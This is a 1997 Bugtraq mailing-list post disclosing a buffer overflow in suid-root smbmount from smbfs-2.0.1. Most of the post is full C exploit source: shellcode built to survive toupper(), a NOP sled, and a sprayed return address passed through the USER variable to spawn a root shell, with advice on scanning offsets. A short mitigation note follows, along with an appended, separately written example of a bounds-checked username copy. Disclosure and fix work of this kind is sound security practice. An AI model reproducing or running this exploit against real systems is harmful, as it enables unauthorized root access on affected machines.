Date: Fri, 27 Jun 1997 12:53:52 -0400
From: Gerald Britton
Reply-To: Gerald Britton
Sender: Bugtraq List
Approved-By: aleph1@UNDERGROUND.ORG
To: BUGTRAQ@NETSPACE.ORG
X-To: bugtraq@fc.net, linux-security@redhat.com
Subject: smbmount buffer overflow

This program exploits a buffer overflow in the smbmount from smbfs-2.0.1.
Systems are only vulnerable if the smbmount binary is installed suid root;
the source distribution does this by default. Redhat does not install this
suid root by default, so those systems are not vulnerable to this attack.

I have also received this note from S.u.S.E.:

> A fixed samba package (with smbfs-2.0.2) is ready. It will be on
>
> ftp://ftp.suse.com/pub/suse_update/S.u.S.E.-4.4.1/n1/samba
>
> in a few minutes. S.u.S.E. Linux 5.0 will include this version also.

Here is the source for the exploit. The default parameters to the program
often work; however, I have found that the offset parameter sometimes varies
wildly. Values between -600 and -100 usually work though; a quick shell
script will scan through these.

----------8<----------8<----------8<----------8<----------8<----------
/*
** smbexpl -- a smbmount root exploit under Linux
**
** Author: Gerald Britton
**
** This code exploits a buffer overflow in smbmount from smbfs-2.0.1.
** The code does not do range checking when copying a username from
** the environment variables USER or LOGNAME.  To get this far into
** the code we need to execute with dummy arguments of a server and a
** mountpoint to use (./a in this case).  The user will need to create
** the ./a directory and then execute smbexpl to gain root.  This code
** is also setup to use /tmp/sh as the shell as bash-2.01 appears to
** do a seteuid(getuid()) so /bin/sh on my system won't work.  Finally
** a "-Q" (an invalid commandline argument) causes smbmount to fail when
** parsing args and terminate, thus jumping into our shellcode.
**
** The shellcode used in this program also needed to be specialized as
** smbmount toupper()'s the contents of the USER variable.  Self modifying
** code was needed to ensure that the shellcode will survive toupper().
**
** The quick fix for the security problem:
**     chmod -s /sbin/smbmount
**
** A better fix would be to patch smbmount to do bounds checking when
** copying the contents of the USER and LOGNAME variables.
**
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define DEFAULT_OFFSET          -202
#define DEFAULT_BUFFER_SIZE      211
#define DEFAULT_ALIGNMENT          2
#define NOP                     0x90

/* This shell code is designed to survive being filtered by toupper() */
char shellcode[] =
  "\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
  "\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
  "\xeb\x05\xe8\xdb\xff\xff\xff"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/tmp/sh";

/* Returns the current stack pointer (left in %eax by the inline asm). */
unsigned long get_sp(void)
{
  __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
  int alignment = DEFAULT_ALIGNMENT;
  int i;

  if (argc > 1) bsize     = atoi(argv[1]);
  if (argc > 2) offset    = atoi(argv[2]);
  if (argc > 3) alignment = atoi(argv[3]);

  printf("bsize=%d offset=%d alignment=%d\n", bsize, offset, alignment);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_sp() - offset;
  fprintf(stderr, "Using address: 0x%lx\n", addr);

  /* Fill the buffer with the guessed return address, starting at the
     requested alignment; stop before a word would run off the end. */
  ptr = buff;
  addr_ptr = (long *) (ptr + alignment);
  for (i = 0; i + 4 <= bsize - alignment; i += 4)
    *(addr_ptr++) = addr;

  /* NOP sled in the first half, shellcode ending at offset 128 */
  for (i = 0; i < bsize / 2; i++)
    buff[i] = NOP;

  ptr = buff + (128 - strlen(shellcode));
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';

  setenv("USER", buff, 1);
  execl("/sbin/smbmount", "smbmount", "//a/a", "./a", "-Q", (char *) 0);
  return 0;
}
----------8<----------8<----------8<----------8<----------8<----------

--
Gerald Britton
gbritton@nih.gov
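An illustration of the bounds-checked copy that the post recommends as the proper fix, added here as an example. This is not smbmount's code: the destination buffer size (USER_MAX), the USER-before-LOGNAME fallback order, and the function names copy_user_unbounded, copy_user_bounded and copy_user_from_env are assumptions made for the illustration. The uppercasing step mirrors the toupper() behaviour the post attributes to smbmount.

```c
/* Added example (not smbmount's code): copy a username taken from the
 * USER or LOGNAME environment variable into a fixed-size buffer with an
 * explicit length check, as the post's "better fix" suggests.  USER_MAX,
 * the USER-then-LOGNAME order and all function names are assumptions. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define USER_MAX 64   /* assumed size of the destination buffer */

/* The unsafe pattern the post describes: nothing checks that src fits
 * dst, so a value longer than USER_MAX-1 bytes writes past the end of
 * the buffer.  Kept only for contrast; nothing below calls it. */
void copy_user_unbounded(char dst[USER_MAX], const char *src)
{
    strcpy(dst, src);
}

/* Bounded replacement.  Uses USER, falling back to LOGNAME, and refuses
 * (rather than silently truncating) a value that does not fit, since a
 * truncated username is not the name the caller asked for.  Returns 0 on
 * success, -1 if the value is too long (or dstlen is 0), -2 if neither
 * variable is set.  Uppercasing mirrors smbmount's toupper() step. */
int copy_user_bounded(char *dst, size_t dstlen,
                      const char *user, const char *logname)
{
    const char *src = user ? user : logname;
    size_t n, i;

    if (dstlen == 0)
        return -1;
    if (src == NULL)
        return -2;
    n = strlen(src);
    if (n >= dstlen)          /* room is needed for the terminating NUL */
        return -1;
    for (i = 0; i < n; i++)
        dst[i] = (char)toupper((unsigned char)src[i]);
    dst[n] = '\0';
    return 0;
}

/* Convenience wrapper that reads the real environment. */
int copy_user_from_env(char *dst, size_t dstlen)
{
    return copy_user_bounded(dst, dstlen, getenv("USER"), getenv("LOGNAME"));
}

int main(void)
{
    char user[USER_MAX];
    int rc = copy_user_from_env(user, sizeof user);

    if (rc == 0)
        printf("user: %s\n", user);
    else if (rc == -1)
        fprintf(stderr, "username longer than %d bytes, refusing\n", USER_MAX - 1);
    else
        fprintf(stderr, "USER and LOGNAME are both unset\n");
    return rc == 0 ? 0 : 1;
}
```

The check `n >= dstlen` is the whole fix: the copy can never write more than dstlen bytes, and the caller learns that the value was rejected instead of continuing with a partially copied name. Passing the buffer length explicitly, rather than relying on a global constant inside the copy routine, keeps the check next to the write it protects.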